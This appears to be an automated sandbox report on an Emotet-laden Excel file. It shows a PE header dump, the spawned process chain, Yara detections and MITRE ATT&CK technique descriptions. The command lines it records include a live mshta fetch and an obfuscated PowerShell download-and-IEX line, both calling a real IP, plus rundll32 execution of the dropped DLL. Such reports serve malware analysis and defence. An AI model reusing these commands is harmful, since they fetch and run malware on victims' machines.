10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PELa!P `]@-R4Pv 0N@`@.text9EP `.rdata``@@.datae000@.rsrcPv`@@.relocv @B

Target ID:	0
Start time:	21:24:16
Start date:	28/01/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13fdf0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 2824, Parent PID: 2648

General

Target ID:	2
Start time:	21:24:18
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c mshta http://91.240.118.168/qqw/aas/se.html
Imagebase:	0x4a730000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exePID: 2840, Parent PID: 2824

General

Target ID:	4
Start time:	21:24:19
Start date:	28/01/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta http://91.240.118.168/qqw/aas/se.html
Imagebase:	0x13ff00000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 3012, Parent PID: 2840

General

Target ID:	6
Start time:	21:24:22
Start date:	28/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Imagebase:	0x13fbc0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: cmd.exePID: 2132, Parent PID: 3012

General

Target ID:	8
Start time:	21:24:34
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Imagebase:	0x4a860000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exePID: 1836, Parent PID: 2132

General

Target ID:	9
Start time:	21:24:34
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exePID: 1904, Parent PID: 1836

General

Target ID:	10
Start time:	21:24:38
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exePID: 2328, Parent PID: 1904

General

Target ID:	11
Start time:	21:25:02
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exePID: 2180, Parent PID: 2328

General

Target ID:	12
Start time:	21:25:06
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exePID: 1328, Parent PID: 2180

General

Target ID:	14
Start time:	21:25:28
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

Analysis Process: rundll32.exePID: 2932, Parent PID: 1328

General

Target ID:	15
Start time:	21:25:33
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: rundll32.exePID: 1524, Parent PID: 2932

General

Target ID:	16
Start time:	21:25:50
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: rundll32.exePID: 2544, Parent PID: 1524

General

Target ID:	17
Start time:	21:25:55
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
Imagebase:	0x520000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
